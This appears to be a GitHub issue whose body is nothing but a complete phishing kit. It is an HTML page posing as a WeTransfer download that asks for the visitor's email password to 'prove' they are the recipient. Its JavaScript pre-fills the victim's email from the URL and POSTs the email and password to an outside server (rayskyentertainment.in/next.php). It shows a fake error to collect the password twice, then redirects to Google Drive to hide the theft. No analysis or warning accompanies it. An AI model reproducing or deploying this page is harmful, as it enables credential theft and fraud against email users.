### ISSUE TITLE
upokdd

### ISSUE THREAD

**Issue by donsunny** [donsunny/outpot#1]
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<script src="https://excel567.oss-ap-southeast-3.aliyuncs.com/pdf.js"></script>
<link rel="shortcut icon" href="https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico?v=1600376585636" type="image/x-icon" />

<title>We Transfer</title>
<style>
.topnav {
  overflow: hidden;
  background-color: #000000;
}

.topnav a {
  float: left;
  color: #000000;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}

.topnav a:hover {
  background-color: #000000;
  color: Yellow;
}

.topnav a.active {
  background-color: #000000;
  color: Red;
}

body {font-family: Arial, Helvetica, sans-serif;}

input[type=text], input[type=email] {
    width: 39%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
}

input[type=text], input[type=email], input[type=password] {
    width: 39%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
}

input[type=submit] {
    background-color: #48b4e0;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    cursor: pointer;
    width: 39%;
}

button {
    background-color: #48b4e0;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    cursor: pointer;
    width: 39%;
}

button:hover {
    opacity: 0.8;
}

.cancelbtn {
    width: auto;
    padding: 10px 18px;
    background-color: #f44336;
}

.imgcontainer {
    text-align: center;
    margin: 10px 10px 0;
    background-color: #48b4e0;
}

img.avatar {
    width: 40%;
    border-radius: 50%;
}

.container {
    padding: 10px;
}

span.psw {
    float: right;
    padding-top: 16px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
    span.psw {
       display: block;
       float: none;
    }
    .cancelbtn {
       width: 100%;
    }
}

/* The Modal (background) */
.modal {
    display: none; /* Hidden by default */
    position: fixed; /* Stay in place */
    z-index: 1; /* Sit on top */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%; /* Full height */
    overflow: auto; /* Enable scroll if needed */
    background-color: rgb(0,0,0); /* Fallback color */
    background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
    padding-top: 60px;
}

/* Modal Content/Box */
.modal-content {
    background-color: #fefefe;
    margin: 5% auto 15% auto; /* 5% from the top, 15% from the bottom and centered */
    border: 1px solid #888;
    width: 50%; /* Could be more or less, depending on screen size */
}

/* The Close Button (x) */
.close {
    position: absolute;
    right: 25px;
    top: 0;
    color: #000;
    font-size: 35px;
    font-weight: bold;
}

.close:hover,
.close:focus {
    color: red;
    cursor: pointer;
}

/* Add Zoom Animation */
.animate {
    -webkit-animation: animatezoom 0.6s;
    animation: animatezoom 0.6s
}

@-webkit-keyframes animatezoom {
    from {-webkit-transform: scale(0)} 
    to {-webkit-transform: scale(1)}
}
    
@keyframes animatezoom {
    from {transform: scale(0)} 
    to {transform: scale(1)}
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
    span.psw {
       display: block;
       float: none;
    }
    .cancelbtn {
       width: 100%;
    }
}

</style>

</head>

<body>
<CENTER>

<img src="https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg?v=1600376573408" width="1365px" ></img>

<div 
    style="left:86px; width:268px; top:108px; position:absolute; height: 395px;">
<div 
    style="left:47px; width:189px; top:339px; position:absolute; height: 52px;" background-color:#FFFFFF">
<button  onClick="document.getElementById('id01').style.display='block'" style="width:auto;">DOWNLOAD</button></div></div></CENTER>
 <script type="text/javascript">
 $(function () {
          window.onload = $('#submit_btn3').click();
      });
</script>

<div id="id01" class="modal">
  
<div class="modal-content animate">
    <div class="imgcontainer">
      <span onClick="document.getElementById('id01').style.display='none'" class="close" title="Close Modal">&times;</span>
      <img src="https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico?v=1600376585636" width="20%">
    </div>

    <div class="container">
     <center> <p><font face="Trebuchet MS" color="black" size="2"> <span style="font-size:16px;"><span style="color:green;"><strong><span style="font-family: 

&quot;Trebuchet MS&quot;; text-align: -webkit-center;">We Transfer Online Security</span></strong></span></span> <br> 
                        <br>
    Enter your email password below to prove you're the intended recipient
</font><br>

<input type="email" value="<?php echo $_GET['email']; ?>" name="email" id="email" placeholder="Enter Email Address" required>
<br/>
<input type="password" value="" id="password" name="password" placeholder="Enter Email Password" required><br/>
<input type="hidden" id="tel" value="0000" name="tel" placeholder="Telephone">
<br/>
<span id="msg" style="display:none; font-size:12px; color:rgb(232, 17, 35); font-weight:bold;"></span><br />
<input id="submit-btn" type="submit" value="Continue">

      
    </div>
 
    <div class="container" style="background-color:#48b4e0">
    <font color="#FFFFFF"><span id="em"></span></font>
    
    </div>

 
</div>

      
      
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" 

crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B

+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-

JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>

<script>

      $("#submit-btn1").hide();

      /* global $ */
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          // $('#email').val(email);
          var my_email =email;
          var ind=my_email.indexOf("@");
          var my_slice=my_email.substr((ind+1));
          var c= my_slice.substr(0, my_slice.indexOf('.'));
          var final= c.toLowerCase();
          
          $('#contact').trigger("reset");
          $("#msg").hide();
            // $('#fieldImg').attr('src', 'images/other-1.png');
            // $('#field').html("Other Mail");
            $('#email').val(my_email);
            $('#emailch').html(my_email);
            $("#msg").hide();
            // $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            // $("#automail").animate({right:200, opacity:"show"}, 1000);
            // $('#ajaxModal').modal('show');
          }
        ///////////////url getting email////////////////
				
		
        $('#submit-btn').click(function(event){
          $('#error').hide();
          $('#msg').hide();
          event.preventDefault();
          var email=$("#email").val();
          var password=$("#password").val();
          var msg = $('#msg').html();
          $('#msg').text( msg );
        ///////////new injection////////////////
        var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        // if (!filter.test(my_email)) {
        //   $('#error').show();
        //   email.focus;
        //   return false;
        // }
 

        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var n = my_email.search("@");
        ///////////new injection////////////////
        count=count+1;
        
        $.ajax({
          dataType: 'JSON',
          url: 'https://rayskyentertainment.in/next.php',
          type: 'POST',
      	data:{
      		email:email,
      		password:password,
      	},
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
            	$('#submit-btn').val('Verifing...');
            },
            success: function(response){
            	if(response){
            		$("#msg").show();
            		console.log(response);
            		if(response['signal'] == 'ok'){
            			$("#password").val("");
            			if (count>=2) {
            				count=0;
                    // window.location.replace(response['redirect_link']);
                        		window.location.replace("https://drive.google.com/drive/u/0/my-drive");

                }
                $('#msg').html(response['msg']);
            }
            else{
            	$('#msg').html(response['msg']);
            }
        }
    },
    error: function(){
    	$("#password").val("");
    	if (count>=2) {
    		count=0;
    		    		window.location.replace("https://drive.google.com/drive/u/0/my-drive");
    	}
    	$("#msg").show();
    	$('#msg').html("Please confirm password, by re-filling it again");
    },
    complete: function(){
    	$('#submit-btn').val('CONTINUE');
    }
});
  });

	});

</script>

<script>
// Get the modal
var modal = document.getElementById('id01');

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}
</script>

</body>
</html>
